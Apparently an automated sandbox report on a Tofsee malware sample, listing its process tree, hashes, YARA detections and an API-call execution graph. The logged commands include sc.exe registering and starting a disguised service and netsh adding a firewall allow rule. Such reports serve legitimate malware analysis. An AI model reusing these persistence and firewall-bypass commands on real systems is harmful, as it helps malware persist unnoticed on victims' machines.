                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:12
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection
                                                                              Imagebase:0xca0000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:13
                                                                              Start time:20:04:19
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:14
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                              Imagebase:0x7ff6d1310000
                                                                              File size:163336 bytes
                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:15
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\sc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\sc.exe" start htdzdeug
                                                                              Imagebase:0xca0000
                                                                              File size:60928 bytes
                                                                              MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:16
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:17
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0x400000
                                                                              File size:12343296 bytes
                                                                              MD5 hash:D83D3102AEE8419201BF810DE2A41992
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.310684388.00000000005B1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown

                                                                              General

                                                                              Target ID:18
                                                                              Start time:20:04:20
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                              Imagebase:0x10f0000
                                                                              File size:82944 bytes
                                                                              MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:19
                                                                              Start time:20:04:21
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:20
                                                                              Start time:20:04:22
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:21
                                                                              Start time:20:04:27
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:22
                                                                              Start time:20:04:27
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                              Imagebase:0x7ff651c80000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:23
                                                                              Start time:20:04:30
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:svchost.exe
                                                                              Imagebase:0xe40000
                                                                              File size:44520 bytes
                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                              General

                                                                              Target ID:24
                                                                              Start time:20:05:29
                                                                              Start date:07/02/2023
                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                              Imagebase:0x7ff6856c0000
                                                                              File size:455656 bytes
                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:25
                                                                              Start time:20:05:29
                                                                              Start date:07/02/2023
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff745070000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:3.7%
                                                                                Dynamic/Decrypted Code Coverage:23.6%
                                                                                Signature Coverage:33.2%
                                                                                Total number of Nodes:1034
                                                                                Total number of Limit Nodes:17
                                                                                execution_graph 15997 2080005 16002 208092b GetPEB 15997->16002 15999 2080030 16004 208003c 15999->16004 16003 2080972 16002->16003 16003->15999 16005 2080049 16004->16005 16019 2080e0f SetErrorMode SetErrorMode 16005->16019 16010 2080265 16011 20802ce VirtualProtect 16010->16011 16012 208030b 16011->16012 16013 2080439 VirtualFree 16012->16013 16017 20804be 16013->16017 16018 20805f4 LoadLibraryA 16013->16018 16014 20804e3 LoadLibraryA 16014->16017 16016 20808c7 16017->16014 16017->16018 16018->16016 16020 2080223 16019->16020 16021 2080d90 16020->16021 16022 2080dad 16021->16022 16023 2080dbb GetPEB 16022->16023 16024 2080238 VirtualAlloc 16022->16024 16023->16024 16024->16010 14829 2080920 TerminateProcess 14830 409a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 14949 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 14830->14949 14832 409a95 14833 409aa3 GetModuleHandleA GetModuleFileNameA 14832->14833 14839 40a3c7 14832->14839 14846 409ac4 14833->14846 14834 40a41c CreateThread WSAStartup 15118 40e52e 14834->15118 14835 409afd GetCommandLineA 14847 409b22 14835->14847 14836 40a406 DeleteFileA 14836->14839 14840 40a40d 14836->14840 14838 40a445 15137 40eaaf 14838->15137 14839->14834 14839->14836 14839->14840 14842 40a3ed GetLastError 14839->14842 14840->14834 14842->14840 14844 40a3f8 Sleep 14842->14844 14843 40a44d 15141 401d96 14843->15141 14844->14836 14846->14835 14850 409c0c 14847->14850 14857 409b47 14847->14857 14848 40a457 15189 4080c9 14848->15189 14950 4096aa 14850->14950 14861 409b96 lstrlenA 14857->14861 14864 409b58 14857->14864 14858 40a1d2 14865 40a1e3 GetCommandLineA 14858->14865 14859 409c39 14862 40a167 GetModuleHandleA GetModuleFileNameA 14859->14862 14956 404280 CreateEventA 14859->14956 14861->14864 14863 409c05 ExitProcess 14862->14863 14867 40a189 14862->14867 14864->14863 14871 40675c 21 API calls 14864->14871 14891 40a205 14865->14891 14867->14863 14873 40a1b2 GetDriveTypeA 14867->14873 14874 409be3 14871->14874 14873->14863 14876 40a1c5 14873->14876 14874->14863 15055 406a60 CreateFileA 14874->15055 15099 409145 GetModuleHandleA GetModuleFileNameA CharToOemA 14876->15099 14882 40a491 14883 40a49f GetTickCount 14882->14883 14885 40a4be Sleep 14882->14885 14890 40a4b7 GetTickCount 14882->14890 15235 40c913 14882->15235 14883->14882 14883->14885 14885->14882 14887 409ca0 GetTempPathA 14888 409e3e 14887->14888 14889 409cba 14887->14889 14894 409e6b GetEnvironmentVariableA 14888->14894 14898 409e04 14888->14898 15011 4099d2 lstrcpyA 14889->15011 14890->14885 14895 40a285 lstrlenA 14891->14895 14907 40a239 14891->14907 14894->14898 14899 409e7d 14894->14899 14895->14907 15094 40ec2e 14898->15094 14900 4099d2 16 API calls 14899->14900 14901 409e9d 14900->14901 14901->14898 14906 409eb0 lstrcpyA lstrlenA 14901->14906 14904 409d5f 15074 406cc9 14904->15074 14905 40a3c2 15111 4098f2 14905->15111 14909 409ef4 14906->14909 15107 406ec3 14907->15107 14913 406dc2 6 API calls 14909->14913 14916 409f03 14909->14916 14912 40a35f 14912->14905 14912->14912 14919 40a37b 14912->14919 14913->14916 14914 40a39d StartServiceCtrlDispatcherA 14914->14905 14915 409cf6 15018 409326 14915->15018 14917 409f32 RegOpenKeyExA 14916->14917 14920 409f0e 14916->14920 14918 409f48 RegSetValueExA RegCloseKey 14917->14918 14923 409f70 14917->14923 14918->14923 14919->14914 14920->14916 14929 409f9d GetModuleHandleA GetModuleFileNameA 14923->14929 14924 409e0c DeleteFileA 14924->14888 14925 409dde GetFileAttributesExA 14925->14924 14926 409df7 14925->14926 14926->14898 14928 409dff 14926->14928 15084 4096ff 14928->15084 14931 409fc2 14929->14931 14932 40a093 14929->14932 14931->14932 14938 409ff1 GetDriveTypeA 14931->14938 14933 40a103 CreateProcessA 14932->14933 14936 40a0a4 wsprintfA 14932->14936 14934 40a13a 14933->14934 14935 40a12a DeleteFileA 14933->14935 14934->14898 14941 4096ff 3 API calls 14934->14941 14935->14934 15090 402544 14936->15090 14938->14932 14939 40a00d 14938->14939 14943 40a02d lstrcatA 14939->14943 14941->14898 14945 40a046 14943->14945 14946 40a052 lstrcatA 14945->14946 14947 40a064 lstrcatA 14945->14947 14946->14947 14947->14932 14948 40a081 lstrcatA 14947->14948 14948->14932 14949->14832 14951 4096b9 14950->14951 15338 4073ff 14951->15338 14953 4096e2 14954 4096f7 14953->14954 15358 40704c 14953->15358 14954->14858 14954->14859 14957 4042a5 14956->14957 14958 40429d 14956->14958 15383 403ecd 14957->15383 14958->14862 14983 40675c 14958->14983 14960 4042b0 15387 404000 14960->15387 14963 4043c1 CloseHandle 14963->14958 14964 4042ce 15393 403f18 WriteFile 14964->15393 14969 4043ba CloseHandle 14969->14963 14970 404318 14971 403f18 4 API calls 14970->14971 14972 404331 14971->14972 14973 403f18 4 API calls 14972->14973 14974 40434a 14973->14974 15401 40ebcc GetProcessHeap RtlAllocateHeap 14974->15401 14977 403f18 4 API calls 14978 404389 14977->14978 14979 40ec2e codecvt 4 API calls 14978->14979 14980 40438f 14979->14980 14981 403f8c 4 API calls 14980->14981 14982 40439f CloseHandle CloseHandle 14981->14982 14982->14958 14984 406784 CreateFileA 14983->14984 14985 40677a SetFileAttributesA 14983->14985 14986 4067a4 CreateFileA 14984->14986 14987 4067b5 14984->14987 14985->14984 14986->14987 14988 4067c5 14987->14988 14989 4067ba SetFileAttributesA 14987->14989 14990 406977 14988->14990 14991 4067cf GetFileSize 14988->14991 14989->14988 14990->14862 14990->14887 14990->14888 14992 4067e5 14991->14992 14993 406965 14991->14993 14992->14993 14995 4067ed ReadFile 14992->14995 14994 40696e FindCloseChangeNotification 14993->14994 14994->14990 14995->14993 14996 406811 SetFilePointer 14995->14996 14996->14993 14997 40682a ReadFile 14996->14997 14997->14993 14998 406848 SetFilePointer 14997->14998 14998->14993 14999 406867 14998->14999 15000 4068d5 14999->15000 15001 406878 ReadFile 14999->15001 15000->14994 15003 40ebcc 4 API calls 15000->15003 15002 4068d0 15001->15002 15004 406891 15001->15004 15002->15000 15005 4068f8 15003->15005 15004->15001 15004->15002 15005->14993 15006 406900 SetFilePointer 15005->15006 15007 40695a 15006->15007 15008 40690d ReadFile 15006->15008 15010 40ec2e codecvt 4 API calls 15007->15010 15008->15007 15009 406922 15008->15009 15009->14994 15010->14993 15012 4099eb 15011->15012 15013 409a2f lstrcatA 15012->15013 15014 40ee2a 15013->15014 15015 409a4b lstrcatA 15014->15015 15016 406a60 13 API calls 15015->15016 15017 409a60 15016->15017 15017->14888 15017->14915 15068 406dc2 15017->15068 15407 401910 15018->15407 15021 40934a GetModuleHandleA GetModuleFileNameA 15023 40937f 15021->15023 15024 4093a4 15023->15024 15025 4093d9 15023->15025 15026 4093c3 wsprintfA 15024->15026 15027 409401 wsprintfA 15025->15027 15028 409415 15026->15028 15027->15028 15031 406cc9 5 API calls 15028->15031 15052 4094a0 15028->15052 15030 4094ac 15033 40962f 15030->15033 15034 4094e8 RegOpenKeyExA 15030->15034 15032 409439 15031->15032 15422 40ef1e lstrlenA 15032->15422 15039 409646 15033->15039 15437 401820 15033->15437 15036 4094fb 15034->15036 15037 409502 15034->15037 15036->15033 15042 40958a 15036->15042 15040 40951f RegQueryValueExA 15037->15040 15048 4095d6 15039->15048 15417 4091eb 15039->15417 15043 409530 15040->15043 15044 409539 15040->15044 15042->15039 15046 409593 15042->15046 15047 40956e RegCloseKey 15043->15047 15049 409556 RegQueryValueExA 15044->15049 15045 409462 15050 40947e wsprintfA 15045->15050 15046->15048 15424 40f0e4 15046->15424 15047->15036 15048->14924 15048->14925 15049->15043 15049->15047 15050->15052 15409 406edd 15052->15409 15053 4095bb 15053->15048 15431 4018e0 15053->15431 15056 406b8c GetLastError 15055->15056 15057 406a8f GetDiskFreeSpaceA 15055->15057 15059 406b86 15056->15059 15058 406ac5 15057->15058 15065 406ad7 15057->15065 15486 40eb0e 15058->15486 15059->14863 15063 406b56 FindCloseChangeNotification 15063->15059 15067 406b65 GetLastError CloseHandle 15063->15067 15064 406b36 GetLastError CloseHandle 15066 406b7f DeleteFileA 15064->15066 15480 406987 15065->15480 15066->15059 15067->15066 15069 406e24 15068->15069 15070 406dd7 15068->15070 15069->14904 15071 406cc9 5 API calls 15070->15071 15072 406ddc 15071->15072 15072->15069 15072->15072 15073 406e02 GetVolumeInformationA 15072->15073 15073->15069 15075 406cdc GetModuleHandleA GetProcAddress 15074->15075 15076 406dbe lstrcpyA lstrcatA lstrcatA 15074->15076 15077 406d12 GetSystemDirectoryA 15075->15077 15078 406cfd 15075->15078 15076->14915 15079 406d27 GetWindowsDirectoryA 15077->15079 15080 406d1e 15077->15080 15078->15077 15081 406d8b 15078->15081 15083 406d42 15079->15083 15080->15079 15080->15081 15081->15076 15082 40ef1e lstrlenA 15082->15081 15083->15082 15085 402544 15084->15085 15086 40972d RegOpenKeyExA 15085->15086 15087 409740 15086->15087 15088 409765 15086->15088 15089 40974f RegDeleteValueA RegCloseKey 15087->15089 15088->14898 15089->15088 15091 402554 lstrcatA 15090->15091 15092 40ee2a 15091->15092 15093 40a0ec lstrcatA 15092->15093 15093->14933 15095 40ec37 15094->15095 15096 40a15d 15094->15096 15494 40eba0 15095->15494 15096->14862 15096->14863 15100 402544 15099->15100 15101 40919e wsprintfA 15100->15101 15102 4091bb 15101->15102 15497 409064 GetTempPathA 15102->15497 15105 4091d5 ShellExecuteA 15106 4091e7 15105->15106 15106->14863 15108 406ed5 15107->15108 15109 406ecc 15107->15109 15108->14912 15110 406e36 2 API calls 15109->15110 15110->15108 15112 4098f6 15111->15112 15113 404280 30 API calls 15112->15113 15114 409904 Sleep 15112->15114 15115 409915 15112->15115 15113->15112 15114->15112 15114->15115 15117 409947 15115->15117 15504 40977c 15115->15504 15117->14839 15526 40dd05 GetTickCount 15118->15526 15120 40e538 15533 40dbcf 15120->15533 15122 40e544 15123 40e555 GetFileSize 15122->15123 15127 40e5b8 15122->15127 15124 40e5b1 CloseHandle 15123->15124 15125 40e566 15123->15125 15124->15127 15543 40db2e 15125->15543 15552 40e3ca RegOpenKeyExA 15127->15552 15129 40e576 ReadFile 15129->15124 15131 40e58d 15129->15131 15547 40e332 15131->15547 15132 40e5f2 15135 40e3ca 19 API calls 15132->15135 15136 40e629 15132->15136 15135->15136 15136->14838 15138 40eabe 15137->15138 15140 40eaba 15137->15140 15139 40dd05 6 API calls 15138->15139 15138->15140 15139->15140 15140->14843 15142 40ee2a 15141->15142 15143 401db4 GetVersionExA 15142->15143 15144 401dd0 GetSystemInfo GetModuleHandleA GetProcAddress 15143->15144 15146 401e24 15144->15146 15147 401e16 GetCurrentProcess 15144->15147 15605 40e819 15146->15605 15147->15146 15149 401e3d 15150 40e819 11 API calls 15149->15150 15151 401e4e 15150->15151 15158 401e77 15151->15158 15612 40df70 15151->15612 15154 401e6c 15156 40df70 12 API calls 15154->15156 15156->15158 15157 40e819 11 API calls 15159 401e93 15157->15159 15621 40ea84 15158->15621 15625 40199c inet_addr LoadLibraryA 15159->15625 15162 40e819 11 API calls 15163 401eb9 15162->15163 15164 401ed8 15163->15164 15165 40f04e 4 API calls 15163->15165 15166 40e819 11 API calls 15164->15166 15167 401ec9 15165->15167 15168 401eee 15166->15168 15169 40ea84 30 API calls 15167->15169 15170 401f0a 15168->15170 15638 401b71 15168->15638 15169->15164 15172 40e819 11 API calls 15170->15172 15174 401f23 15172->15174 15173 401efd 15176 40ea84 30 API calls 15173->15176 15175 401f3f 15174->15175 15642 401bdf 15174->15642 15178 40e819 11 API calls 15175->15178 15176->15170 15180 401f5e 15178->15180 15182 401f77 15180->15182 15183 40ea84 30 API calls 15180->15183 15181 40ea84 30 API calls 15181->15175 15649 4030b5 15182->15649 15183->15182 15186 406ec3 2 API calls 15188 401f8e GetTickCount 15186->15188 15188->14848 15190 406ec3 2 API calls 15189->15190 15191 4080eb 15190->15191 15192 4080f9 15191->15192 15193 4080ef 15191->15193 15195 40704c 16 API calls 15192->15195 15697 407ee6 15193->15697 15197 408110 15195->15197 15196 4080f4 15198 40675c 21 API calls 15196->15198 15207 408269 CreateThread 15196->15207 15197->15196 15199 408156 RegOpenKeyExA 15197->15199 15203 408244 15198->15203 15199->15196 15200 40816d RegQueryValueExA 15199->15200 15201 4081f7 15200->15201 15202 40818d 15200->15202 15204 40820d RegCloseKey 15201->15204 15206 40ec2e codecvt 4 API calls 15201->15206 15202->15201 15208 40ebcc 4 API calls 15202->15208 15205 40ec2e codecvt 4 API calls 15203->15205 15203->15207 15204->15196 15205->15207 15213 4081dd 15206->15213 15214 405e6c 15207->15214 15209 4081a0 15208->15209 15209->15204 15210 4081aa RegQueryValueExA 15209->15210 15210->15201 15211 4081c4 15210->15211 15212 40ebcc 4 API calls 15211->15212 15212->15213 15213->15204 15765 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 15214->15765 15216 405e71 15766 40e654 15216->15766 15218 405ec1 15219 403132 15218->15219 15220 40df70 12 API calls 15219->15220 15221 40313b 15220->15221 15222 40c125 15221->15222 15777 40ec54 GetSystemTimeAsFileTime GetVolumeInformationA GetTickCount 15222->15777 15224 40c12d 15225 40e654 13 API calls 15224->15225 15226 40c2bd 15225->15226 15227 40e654 13 API calls 15226->15227 15228 40c2c9 15227->15228 15229 40e654 13 API calls 15228->15229 15230 40a47a 15229->15230 15231 408db1 15230->15231 15232 408dbc 15231->15232 15233 40e654 13 API calls 15232->15233 15234 408dec Sleep 15233->15234 15234->14882 15236 40c92f 15235->15236 15237 40c93c 15236->15237 15778 40c517 15236->15778 15239 40ca2b 15237->15239 15240 40e819 11 API calls 15237->15240 15239->14882 15241 40c96a 15240->15241 15242 40e819 11 API calls 15241->15242 15243 40c97d 15242->15243 15244 40e819 11 API calls 15243->15244 15245 40c990 15244->15245 15246 40c9aa 15245->15246 15247 40ebcc 4 API calls 15245->15247 15246->15239 15795 402684 15246->15795 15247->15246 15252 40ca26 15802 40c8aa 15252->15802 15255 40ca44 15256 40ca4b closesocket 15255->15256 15257 40ca83 15255->15257 15256->15252 15258 40ea84 30 API calls 15257->15258 15259 40caac 15258->15259 15260 40f04e 4 API calls 15259->15260 15261 40cab2 15260->15261 15262 40ea84 30 API calls 15261->15262 15263 40caca 15262->15263 15264 40ea84 30 API calls 15263->15264 15265 40cad9 15264->15265 15810 40c65c 15265->15810 15268 40cb60 closesocket 15268->15239 15270 40dad2 closesocket 15271 40e318 23 API calls 15270->15271 15271->15239 15272 40df4c 20 API calls 15297 40cb70 15272->15297 15277 40e654 13 API calls 15277->15297 15280 40f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 15280->15297 15284 40c65c send GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 15284->15297 15285 40ea84 30 API calls 15285->15297 15286 40d815 wsprintfA 15286->15297 15287 40cc1c GetTempPathA 15287->15297 15288 40d569 closesocket Sleep 15857 40e318 15288->15857 15289 407ead 6 API calls 15289->15297 15290 40c517 23 API calls 15290->15297 15292 40e8a1 30 API calls 15292->15297 15293 40d582 ExitProcess 15294 40cfe3 GetSystemDirectoryA 15294->15297 15295 40675c 21 API calls 15295->15297 15296 40d027 GetSystemDirectoryA 15296->15297 15297->15270 15297->15272 15297->15277 15297->15280 15297->15284 15297->15285 15297->15286 15297->15287 15297->15288 15297->15289 15297->15290 15297->15292 15297->15294 15297->15295 15297->15296 15298 40cfad GetEnvironmentVariableA 15297->15298 15299 40d105 lstrcatA 15297->15299 15300 40ef1e lstrlenA 15297->15300 15301 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15297->15301 15302 40cc9f CreateFileA 15297->15302 15303 40d15b CreateFileA 15297->15303 15308 40d149 SetFileAttributesA 15297->15308 15310 40d36e GetEnvironmentVariableA 15297->15310 15311 40d1bf SetFileAttributesA 15297->15311 15312 408e26 GetSystemTime SystemTimeToFileTime CreateFileW DeviceIoControl CloseHandle 15297->15312 15314 40d22d GetEnvironmentVariableA 15297->15314 15316 40d3af lstrcatA 15297->15316 15318 407fcf 64 API calls 15297->15318 15319 40d3f2 CreateFileA 15297->15319 15325 40d26e lstrcatA 15297->15325 15327 40d4b1 CreateProcessA 15297->15327 15328 40d3e0 SetFileAttributesA 15297->15328 15329 40d2b1 CreateFileA 15297->15329 15331 40d452 SetFileAttributesA 15297->15331 15333 407ee6 64 API calls 15297->15333 15334 40d29f SetFileAttributesA 15297->15334 15337 40d31d SetFileAttributesA 15297->15337 15818 40c75d 15297->15818 15830 407e2f 15297->15830 15852 407ead 15297->15852 15862 4031d0 15297->15862 15879 403c09 15297->15879 15889 403a00 15297->15889 15893 40e7b4 15297->15893 15896 40c06c 15297->15896 15902 406f5f GetUserNameA 15297->15902 15913 40e854 15297->15913 15923 407dd6 15297->15923 15298->15297 15299->15297 15300->15297 15301->15297 15302->15297 15304 40ccc6 WriteFile 15302->15304 15303->15297 15305 40d182 WriteFile CloseHandle 15303->15305 15306 40cdcc CloseHandle 15304->15306 15307 40cced CloseHandle 15304->15307 15305->15297 15306->15297 15313 40cd2f 15307->15313 15308->15303 15309 40cd16 wsprintfA 15309->15313 15310->15297 15311->15297 15312->15297 15313->15309 15839 407fcf 15313->15839 15314->15297 15316->15297 15316->15319 15318->15297 15319->15297 15322 40d415 WriteFile CloseHandle 15319->15322 15320 40cd81 WaitForSingleObject CloseHandle CloseHandle 15323 40f04e 4 API calls 15320->15323 15321 40cda5 15324 407ee6 64 API calls 15321->15324 15322->15297 15323->15321 15326 40cdbd DeleteFileA 15324->15326 15325->15297 15325->15329 15326->15297 15327->15297 15330 40d4e8 CloseHandle CloseHandle 15327->15330 15328->15319 15329->15297 15332 40d2d8 WriteFile CloseHandle 15329->15332 15330->15297 15331->15297 15332->15297 15333->15297 15334->15329 15337->15297 15339 40741b 15338->15339 15340 406dc2 6 API calls 15339->15340 15341 40743f 15340->15341 15342 407469 RegOpenKeyExA 15341->15342 15343 4077f9 15342->15343 15353 407487 ___ascii_stricmp 15342->15353 15343->14953 15344 407703 RegEnumKeyA 15345 407714 RegCloseKey 15344->15345 15344->15353 15345->15343 15346 4074d2 RegOpenKeyExA 15346->15353 15347 40772c 15349 407742 RegCloseKey 15347->15349 15350 40774b 15347->15350 15348 407521 RegQueryValueExA 15348->15353 15349->15350 15352 4077ec RegCloseKey 15350->15352 15351 4076e4 RegCloseKey 15351->15353 15352->15343 15353->15344 15353->15346 15353->15347 15353->15348 15353->15351 15355 40f1a5 lstrlenA 15353->15355 15356 40777e GetFileAttributesExA 15353->15356 15357 407769 15353->15357 15354 4077e3 RegCloseKey 15354->15352 15355->15353 15356->15357 15357->15354 15359 407073 15358->15359 15360 4070b9 RegOpenKeyExA 15359->15360 15361 4070d0 15360->15361 15375 4071b8 15360->15375 15362 406dc2 6 API calls 